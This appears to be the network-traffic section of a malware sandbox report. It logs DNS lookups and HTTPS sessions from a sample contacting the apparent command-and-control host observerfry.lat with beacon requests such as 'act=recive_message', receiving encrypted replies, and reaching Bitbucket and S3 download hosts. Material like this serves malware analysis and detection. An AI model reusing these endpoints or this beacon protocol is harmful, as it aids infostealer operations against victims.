                                                                                                                                              Dec 24, 2024 08:51:05.629528999 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.635210037 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.635257959 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.635279894 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.635288954 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.635324001 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.641688108 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.641741037 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.641755104 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.641765118 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.641793966 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.683475971 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.683496952 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.730367899 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.743911982 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.770915985 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.791735888 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.791765928 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.791811943 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.791820049 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.791846037 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.791865110 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.791870117 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.791903973 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.791965008 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.798325062 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.798369884 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.798401117 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.798410892 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.798444033 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.804611921 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.804651976 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.804682970 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.804692984 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.804721117 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.804739952 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.805588961 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.805659056 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.806130886 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.970324039 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:06.004858971 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:06.222743988 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:06.222768068 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:06.222781897 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:06.222788095 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Dec 24, 2024 08:50:35.302262068 CET5659253192.168.2.71.1.1.1
                                                                                                                                              Dec 24, 2024 08:50:35.521568060 CET53565921.1.1.1192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:58.777879000 CET5150753192.168.2.71.1.1.1
                                                                                                                                              Dec 24, 2024 08:50:58.914823055 CET53515071.1.1.1192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:01.194436073 CET5401153192.168.2.71.1.1.1
                                                                                                                                              Dec 24, 2024 08:51:01.519340038 CET53540111.1.1.1192.168.2.7
                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Dec 24, 2024 08:50:35.302262068 CET192.168.2.71.1.1.10x46e4Standard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:50:58.777879000 CET192.168.2.71.1.1.10x690cStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:51:01.194436073 CET192.168.2.71.1.1.10x7547Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Dec 24, 2024 08:50:35.521568060 CET1.1.1.1192.168.2.70x46e4No error (0)observerfry.lat172.67.199.72A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:50:35.521568060 CET1.1.1.1192.168.2.70x46e4No error (0)observerfry.lat104.21.36.201A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:50:58.914823055 CET1.1.1.1192.168.2.70x690cNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:50:58.914823055 CET1.1.1.1192.168.2.70x690cNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:50:58.914823055 CET1.1.1.1192.168.2.70x690cNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:51:01.519340038 CET1.1.1.1192.168.2.70x7547No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:51:01.519340038 CET1.1.1.1192.168.2.70x7547No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:51:01.519340038 CET1.1.1.1192.168.2.70x7547No error (0)s3-w.us-east-1.amazonaws.com16.15.177.52A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:51:01.519340038 CET1.1.1.1192.168.2.70x7547No error (0)s3-w.us-east-1.amazonaws.com52.217.43.44A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:51:01.519340038 CET1.1.1.1192.168.2.70x7547No error (0)s3-w.us-east-1.amazonaws.com3.5.29.254A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:51:01.519340038 CET1.1.1.1192.168.2.70x7547No error (0)s3-w.us-east-1.amazonaws.com16.15.178.13A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:51:01.519340038 CET1.1.1.1192.168.2.70x7547No error (0)s3-w.us-east-1.amazonaws.com52.217.132.121A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:51:01.519340038 CET1.1.1.1192.168.2.70x7547No error (0)s3-w.us-east-1.amazonaws.com3.5.16.126A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:51:01.519340038 CET1.1.1.1192.168.2.70x7547No error (0)s3-w.us-east-1.amazonaws.com54.231.168.185A (IP address)IN (0x0001)false
                                                                                                                                              Dec 24, 2024 08:51:01.519340038 CET1.1.1.1192.168.2.70x7547No error (0)s3-w.us-east-1.amazonaws.com54.231.167.17A (IP address)IN (0x0001)false
                                                                                                                                              • observerfry.lat
                                                                                                                                              • bitbucket.org
                                                                                                                                              • bbuseruploads.s3.amazonaws.com
                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.749700172.67.199.72443424C:\Users\user\Desktop\tTGxYWtjG5.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-24 07:50:37 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 8
                                                                                                                                              Host: observerfry.lat
                                                                                                                                              2024-12-24 07:50:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                              Data Ascii: act=life
                                                                                                                                              2024-12-24 07:50:37 UTC1124INHTTP/1.1 200 OK
                                                                                                                                              Date: Tue, 24 Dec 2024 07:50:37 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=2v96525mj3c9t7abjo39huqjc3; expires=Sat, 19 Apr 2025 01:37:16 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gsZdz05P0Aq%2BjTU8XvSCs7s8BSRRZamw3iQiWeGNMGEhSR17L%2FpeRmD9rxSUu8Y7zoMjTb7FZDqSDAIOX1AMow5mPbyghesiR3viBNJzm6f9dNQq9hz3xAQK8VItcoG%2B6XQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f6f0062fd0c8c93-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1767&rtt_var=673&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1615044&cwnd=192&unsent_bytes=0&cid=8dcff7ebc62e4349&ts=1118&x=0"
                                                                                                                                              2024-12-24 07:50:37 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                              Data Ascii: 2ok
                                                                                                                                              2024-12-24 07:50:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.2.749701172.67.199.72443424C:\Users\user\Desktop\tTGxYWtjG5.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-24 07:50:39 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 53
                                                                                                                                              Host: observerfry.lat
                                                                                                                                              2024-12-24 07:50:39 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                              2024-12-24 07:50:39 UTC1123INHTTP/1.1 200 OK
                                                                                                                                              Date: Tue, 24 Dec 2024 07:50:39 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=jma5h9ahoimjvmpe936ncf8giq; expires=Sat, 19 Apr 2025 01:37:18 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVjZd9kxegqZT5oeBPW4hl2IdIDo5jEiOrYJTyOk79lANhPW9ySGth6LTjeiqB1nbmaq81%2FvCanzNwn4Q7WmU1guywvYsr%2Fef%2BkoG7moaP02xUJaphwyAEgqTNWYxPmlAKc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f6f00702b6e8c17-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1769&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1586956&cwnd=240&unsent_bytes=0&cid=df44fcb5a15e3f75&ts=778&x=0"
                                                                                                                                              2024-12-24 07:50:39 UTC246INData Raw: 34 36 64 0d 0a 71 67 68 39 2b 65 61 66 42 41 49 30 35 64 2f 64 53 2f 74 35 72 2b 50 57 34 75 6f 54 64 56 50 72 6f 4b 66 56 51 4d 62 78 53 34 33 52 4b 67 76 62 33 4b 73 6f 49 45 65 41 2f 65 63 2f 69 51 7a 4b 7a 2f 53 44 6a 6a 46 50 4e 59 72 4d 31 4c 42 73 35 49 63 6d 72 35 42 75 48 4a 57 56 2b 69 67 67 55 5a 33 39 35 78 43 41 57 38 71 4e 39 4e 6a 49 64 68 38 78 69 73 7a 46 74 43 75 70 67 53 66 75 77 6d 51 61 6b 59 50 38 59 47 4e 59 69 4c 71 34 4c 70 6f 54 77 59 71 37 69 6f 63 78 57 58 47 4f 32 6f 58 76 59 6f 75 55 50 2b 7a 6e 61 51 36 53 78 4f 49 6f 65 52 61 41 73 66 39 78 32 52 6a 4b 67 62 71 45 6a 6e 67 64 4f 34 50 45 78 4c 45 71 74 70 67 74 35 63 4a 71 47 5a 43 4a 39 58 52 75 55 6f 2b 78 76 69 53 61 57 34 50 42 73 35 6a 49 4b
                                                                                                                                              Data Ascii: 46dqgh9+eafBAI05d/dS/t5r+PW4uoTdVProKfVQMbxS43RKgvb3KsoIEeA/ec/iQzKz/SDjjFPNYrM1LBs5Icmr5BuHJWV+iggUZ395xCAW8qN9NjIdh8xiszFtCupgSfuwmQakYP8YGNYiLq4LpoTwYq7iocxWXGO2oXvYouUP+znaQ6SxOIoeRaAsf9x2RjKgbqEjngdO4PExLEqtpgt5cJqGZCJ9XRuUo+xviSaW4PBs5jIK
                                                                                                                                              2024-12-24 07:50:39 UTC894INData Raw: 56 64 69 75 38 48 55 70 6a 65 70 67 79 2b 76 31 79 51 47 32 34 50 78 4a 6a 67 57 6a 37 47 78 4c 4a 6f 55 79 6f 43 30 6b 6f 64 78 46 44 6d 42 78 73 2b 34 4c 61 75 64 49 2b 6a 41 59 78 69 55 67 2f 56 67 62 31 58 48 38 2f 38 75 67 56 75 56 77 5a 53 51 69 33 49 44 50 4a 69 43 32 76 6b 37 35 4a 51 6c 72 35 41 71 47 5a 57 46 38 47 5a 79 58 6f 79 32 75 6a 75 53 45 73 43 4d 74 49 32 43 66 68 51 78 6a 73 6a 50 75 43 69 67 6e 69 54 70 79 47 70 66 31 63 54 36 66 69 41 4f 78 35 36 36 4f 5a 34 58 32 38 4f 4f 77 4a 63 2f 44 6e 47 4f 7a 6f 58 76 59 71 79 57 4b 75 7a 44 5a 52 79 54 6a 2b 39 6d 63 6c 43 4b 75 4b 30 76 6e 42 58 48 67 71 61 4b 68 6e 63 55 4f 49 4c 4c 77 4c 41 6d 35 4e 31 70 36 4e 41 71 52 39 75 6c 38 47 31 73 58 4a 43 39 2f 7a 62 58 41 6f 32 47 75 4d 44 51
                                                                                                                                              Data Ascii: Vdiu8HUpjepgy+v1yQG24PxJjgWj7GxLJoUyoC0kodxFDmBxs+4LaudI+jAYxiUg/Vgb1XH8/8ugVuVwZSQi3IDPJiC2vk75JQlr5AqGZWF8GZyXoy2ujuSEsCMtI2CfhQxjsjPuCigniTpyGpf1cT6fiAOx566OZ4X28OOwJc/DnGOzoXvYqyWKuzDZRyTj+9mclCKuK0vnBXHgqaKhncUOILLwLAm5N1p6NAqR9ul8G1sXJC9/zbXAo2GuMDQ
                                                                                                                                              2024-12-24 07:50:39 UTC1369INData Raw: 34 34 61 66 0d 0a 6f 65 65 4d 51 68 2f 6b 49 4c 43 75 32 4c 38 30 79 62 67 78 32 49 66 6d 6f 44 77 59 6d 46 62 69 37 53 38 4a 5a 55 54 77 49 32 77 6a 34 42 35 46 44 6d 62 7a 4d 75 78 4a 4b 53 57 61 61 47 49 62 51 66 62 33 4c 31 43 62 6b 47 54 74 76 30 63 6d 68 58 44 68 71 4c 41 6c 7a 38 4f 63 59 37 4f 68 65 39 69 71 70 34 69 34 38 39 6a 48 70 69 45 39 32 68 76 58 49 2b 31 76 79 53 59 45 4d 57 48 75 59 75 48 66 68 41 35 69 73 37 41 75 69 48 6b 33 57 6e 6f 30 43 70 48 32 36 48 7a 5a 58 46 48 78 59 69 38 4a 35 63 63 32 38 47 72 7a 70 45 78 45 44 33 4a 6d 6f 57 39 4a 61 4f 58 4a 4f 58 4c 62 68 75 57 69 2f 52 76 61 55 53 4e 73 62 45 37 6c 42 48 49 6a 37 69 46 68 33 45 57 4d 49 66 49 7a 76 64 73 35 4a 51 78 72 35 41 71 4d 4a 61 55 37 32 78 72 52 38 57 49 76 43
                                                                                                                                              Data Ascii: 44afoeeMQh/kILCu2L80ybgx2IfmoDwYmFbi7S8JZUTwI2wj4B5FDmbzMuxJKSWaaGIbQfb3L1CbkGTtv0cmhXDhqLAlz8OcY7Ohe9iqp4i489jHpiE92hvXI+1vySYEMWHuYuHfhA5is7AuiHk3Wno0CpH26HzZXFHxYi8J5cc28GrzpExED3JmoW9JaOXJOXLbhuWi/RvaUSNsbE7lBHIj7iFh3EWMIfIzvds5JQxr5AqMJaU72xrR8WIvC
                                                                                                                                              2024-12-24 07:50:39 UTC1369INData Raw: 77 5a 75 44 6e 6e 74 58 4c 73 66 62 68 62 41 75 35 4d 74 70 35 63 52 75 48 4a 65 4e 38 57 74 68 55 6f 43 77 75 79 6d 66 48 63 69 41 76 34 69 45 66 68 30 39 6a 63 37 4d 73 53 36 6e 6b 43 2b 76 68 69 6f 59 67 38 53 6c 4a 6b 46 62 6a 4c 47 2f 4b 6f 67 63 6a 63 2f 30 6a 6f 35 78 56 32 6d 66 30 74 4b 77 50 65 71 4b 61 65 6a 45 4b 6b 66 62 6a 75 39 6a 62 6c 4b 4e 75 4c 73 6c 6b 78 76 49 6b 37 79 47 6a 33 30 66 4e 49 62 45 77 4c 6f 6c 72 35 41 37 2f 63 74 75 45 5a 66 45 73 79 5a 6e 54 73 66 6c 2f 77 79 4f 47 4e 32 48 74 38 43 58 50 77 35 78 6a 73 36 46 37 32 4b 6b 6e 53 58 6b 7a 32 45 55 6e 34 44 39 61 32 74 59 69 62 53 7a 49 5a 55 63 33 34 79 78 69 49 4a 34 45 6a 32 45 77 64 65 30 49 2b 54 64 61 65 6a 51 4b 6b 66 62 6f 38 35 52 51 78 61 59 38 36 5a 70 6e 68 65
                                                                                                                                              Data Ascii: wZuDnntXLsfbhbAu5Mtp5cRuHJeN8WthUoCwuymfHciAv4iEfh09jc7MsS6nkC+vhioYg8SlJkFbjLG/Kogcjc/0jo5xV2mf0tKwPeqKaejEKkfbju9jblKNuLslkxvIk7yGj30fNIbEwLolr5A7/ctuEZfEsyZnTsfl/wyOGN2Ht8CXPw5xjs6F72KknSXkz2EUn4D9a2tYibSzIZUc34yxiIJ4Ej2Ewde0I+TdaejQKkfbo85RQxaY86Zpnhe
                                                                                                                                              2024-12-24 07:50:39 UTC1369INData Raw: 49 74 2b 48 48 47 57 6a 4e 7a 33 4a 61 6a 54 63 61 2f 50 59 68 65 56 68 2f 74 74 62 46 71 47 74 4c 6b 73 6b 52 7a 43 68 72 32 48 69 48 63 46 4e 6f 54 4c 78 62 77 72 72 70 63 6f 35 49 67 6b 58 35 79 63 76 54 34 67 5a 49 43 72 72 79 72 5a 42 49 4f 59 39 49 65 45 4d 55 39 78 68 4e 44 45 73 6a 43 67 6e 43 4c 39 77 32 77 66 6e 70 62 36 61 6d 70 5a 68 4c 57 79 4b 70 45 4a 7a 59 79 30 6b 70 70 33 48 44 2f 4a 6a 49 57 77 4f 75 54 4c 61 64 37 66 59 56 2b 45 79 75 51 6d 5a 31 72 48 35 66 38 71 6b 78 62 44 6b 37 43 47 67 33 49 5a 4f 59 7a 4b 77 62 30 76 71 35 67 6a 35 73 42 71 45 4a 36 4d 39 6d 42 75 56 34 47 78 73 6d 6e 58 57 38 71 5a 39 4e 6a 49 56 67 30 38 6a 39 58 55 67 69 57 6b 77 6d 6e 77 68 6e 4e 66 6e 49 69 39 50 69 42 62 69 37 65 79 4c 4a 30 54 79 6f 4b 31
                                                                                                                                              Data Ascii: It+HHGWjNz3JajTca/PYheVh/ttbFqGtLkskRzChr2HiHcFNoTLxbwrrpco5IgkX5ycvT4gZICrryrZBIOY9IeEMU9xhNDEsjCgnCL9w2wfnpb6ampZhLWyKpEJzYy0kpp3HD/JjIWwOuTLad7fYV+EyuQmZ1rH5f8qkxbDk7CGg3IZOYzKwb0vq5gj5sBqEJ6M9mBuV4GxsmnXW8qZ9NjIVg08j9XUgiWkwmnwhnNfnIi9PiBbi7eyLJ0TyoK1
                                                                                                                                              2024-12-24 07:50:39 UTC1369INData Raw: 41 39 79 5a 71 46 75 53 2b 69 6b 69 6a 6e 77 47 6f 5a 6b 59 44 2b 62 32 4e 52 6a 72 75 30 4b 70 4d 55 79 6f 65 77 67 49 4e 32 47 54 65 4d 79 63 7a 33 62 4f 53 55 4d 61 2b 51 4b 6a 6d 34 6c 75 39 55 62 6c 57 63 2f 61 42 6e 67 46 76 4b 6a 66 54 59 79 48 6f 66 50 70 76 48 7a 4c 38 6d 72 5a 4d 74 35 63 56 74 48 35 36 4a 2b 47 4a 75 55 6f 43 39 73 79 61 65 45 38 4b 46 74 49 2f 49 50 31 63 32 6b 59 4b 64 39 77 4b 76 68 51 6a 68 77 33 68 66 68 4d 72 6b 4a 6d 64 61 78 2b 58 2f 4a 35 41 61 78 59 2b 34 69 49 78 6a 46 7a 71 41 7a 63 53 34 49 71 65 53 49 2b 66 61 62 42 2b 51 6a 50 70 75 5a 46 69 56 76 4c 42 70 31 31 76 4b 6d 66 54 59 79 45 41 42 4e 6f 37 4e 68 35 34 6c 76 35 49 6a 37 4d 4e 6d 58 34 54 4b 35 43 5a 6e 57 73 66 6c 2f 79 53 56 46 73 6d 54 75 49 43 49 65
                                                                                                                                              Data Ascii: A9yZqFuS+ikijnwGoZkYD+b2NRjru0KpMUyoewgIN2GTeMycz3bOSUMa+QKjm4lu9UblWc/aBngFvKjfTYyHofPpvHzL8mrZMt5cVtH56J+GJuUoC9syaeE8KFtI/IP1c2kYKd9wKvhQjhw3hfhMrkJmdax+X/J5AaxY+4iIxjFzqAzcS4IqeSI+fabB+QjPpuZFiVvLBp11vKmfTYyEABNo7Nh54lv5Ij7MNmX4TK5CZnWsfl/ySVFsmTuICIe
                                                                                                                                              2024-12-24 07:50:39 UTC1369INData Raw: 4a 79 37 49 6a 71 4a 6b 75 34 64 70 72 46 5a 65 46 2b 6d 46 72 52 49 79 76 74 43 47 61 46 63 57 49 74 49 36 49 63 42 6f 78 79 59 79 46 73 44 72 6b 79 32 6e 4b 36 33 30 4a 6b 63 62 65 63 58 5a 63 67 4c 47 70 49 70 67 59 32 34 79 6b 77 4d 59 78 42 6a 61 59 67 70 32 68 4d 72 4f 55 4e 71 48 52 4b 68 69 58 78 4b 55 6d 61 31 6d 4a 73 4c 51 74 6b 42 37 46 67 72 47 46 67 6e 30 62 4d 49 48 4c 7a 37 49 6e 6f 70 6b 71 34 63 64 72 45 35 2b 4e 38 32 38 67 47 4d 65 36 70 32 6e 42 57 2f 75 52 73 35 69 46 59 56 55 44 69 74 50 55 6f 69 2b 30 6c 57 76 41 79 32 59 63 6e 6f 50 74 4a 6e 38 59 6e 76 32 34 4a 64 6c 44 6a 59 47 77 6a 49 74 32 47 54 36 45 7a 63 4b 38 4c 61 36 64 4f 2b 44 4e 59 68 4f 54 69 65 39 73 61 6b 53 4f 74 4c 49 6e 6b 51 6e 4f 77 66 72 41 6a 32 6c 58 61 63
                                                                                                                                              Data Ascii: Jy7IjqJku4dprFZeF+mFrRIyvtCGaFcWItI6IcBoxyYyFsDrky2nK630JkcbecXZcgLGpIpgY24ykwMYxBjaYgp2hMrOUNqHRKhiXxKUma1mJsLQtkB7FgrGFgn0bMIHLz7Inopkq4cdrE5+N828gGMe6p2nBW/uRs5iFYVUDitPUoi+0lWvAy2YcnoPtJn8Ynv24JdlDjYGwjIt2GT6EzcK8La6dO+DNYhOTie9sakSOtLInkQnOwfrAj2lXac
                                                                                                                                              2024-12-24 07:50:39 UTC1369INData Raw: 45 37 4b 65 4f 65 7a 4e 62 53 47 6c 69 76 70 79 5a 31 69 42 76 66 39 6e 32 52 53 4e 32 59 33 41 77 44 45 6f 66 38 6e 61 68 65 39 69 6b 5a 41 6e 34 63 39 38 44 74 61 6e 36 6e 42 71 54 63 57 62 75 44 69 51 44 63 43 54 39 4d 37 49 64 31 64 70 32 59 79 46 73 7a 50 6b 79 33 6d 39 6b 7a 39 4d 7a 4e 53 76 65 53 35 50 78 36 76 2f 63 63 74 56 6a 5a 50 30 32 4d 67 32 46 43 4f 62 78 4d 61 68 49 65 4f 74 46 38 2f 44 66 42 36 57 6a 2f 46 59 58 6b 4f 45 73 37 45 75 6a 77 71 4e 7a 2f 53 50 79 43 6b 75 63 63 47 43 2b 76 6c 69 76 4e 4e 78 72 2f 31 70 45 5a 57 44 36 33 63 74 64 6f 79 72 76 69 53 53 46 34 2b 41 75 5a 43 50 4d 56 6c 78 6a 34 4b 64 35 32 7a 6b 6c 7a 69 76 6b 44 70 4e 77 4e 47 75 4d 54 41 45 6d 50 4f 6d 61 59 39 62 6c 64 50 36 77 4a 6f 78 54 33 48 4f 77 64 65
                                                                                                                                              Data Ascii: E7KeOezNbSGlivpyZ1iBvf9n2RSN2Y3AwDEof8nahe9ikZAn4c98Dtan6nBqTcWbuDiQDcCT9M7Id1dp2YyFszPky3m9kz9MzNSveS5Px6v/cctVjZP02Mg2FCObxMahIeOtF8/DfB6Wj/FYXkOEs7EujwqNz/SPyCkuccGC+vlivNNxr/1pEZWD63ctdoyrviSSF4+AuZCPMVlxj4Kd52zklzivkDpNwNGuMTAEmPOmaY9bldP6wJoxT3HOwde
                                                                                                                                              2024-12-24 07:50:39 UTC1369INData Raw: 69 72 76 77 79 70 52 32 34 4b 39 50 6a 49 59 78 37 6d 75 61 63 46 4c 6e 39 72 68 30 39 38 68 52 53 37 48 32 34 57 68 59 76 7a 42 5a 36 2f 61 4b 6b 66 62 77 2f 35 30 63 6c 43 45 71 37 78 75 70 79 58 72 67 72 4f 47 69 33 38 41 49 4d 76 74 78 72 77 75 71 4a 51 2f 30 66 5a 2f 48 4a 57 4b 2b 6e 42 78 46 73 6e 39 73 47 6e 42 49 6f 32 51 76 6f 66 45 4f 56 73 67 6d 73 7a 4f 6f 53 58 6b 72 47 65 76 30 43 70 48 32 37 48 2b 61 47 35 52 6b 61 7a 79 44 35 6f 63 79 34 4b 36 6c 35 6b 78 57 58 47 50 67 70 33 6c 62 4f 53 58 4f 4b 2b 51 4f 6b 33 41 30 61 34 78 4d 41 53 59 38 36 5a 70 6a 31 75 56 30 76 72 41 6d 6a 46 50 63 63 37 4d 79 4c 59 68 71 70 41 37 2f 63 35 70 43 5a 6a 44 77 31 68 46 57 34 71 34 73 53 36 6e 4a 65 79 4c 70 49 32 48 64 69 6b 50 76 74 50 43 70 32 43 43
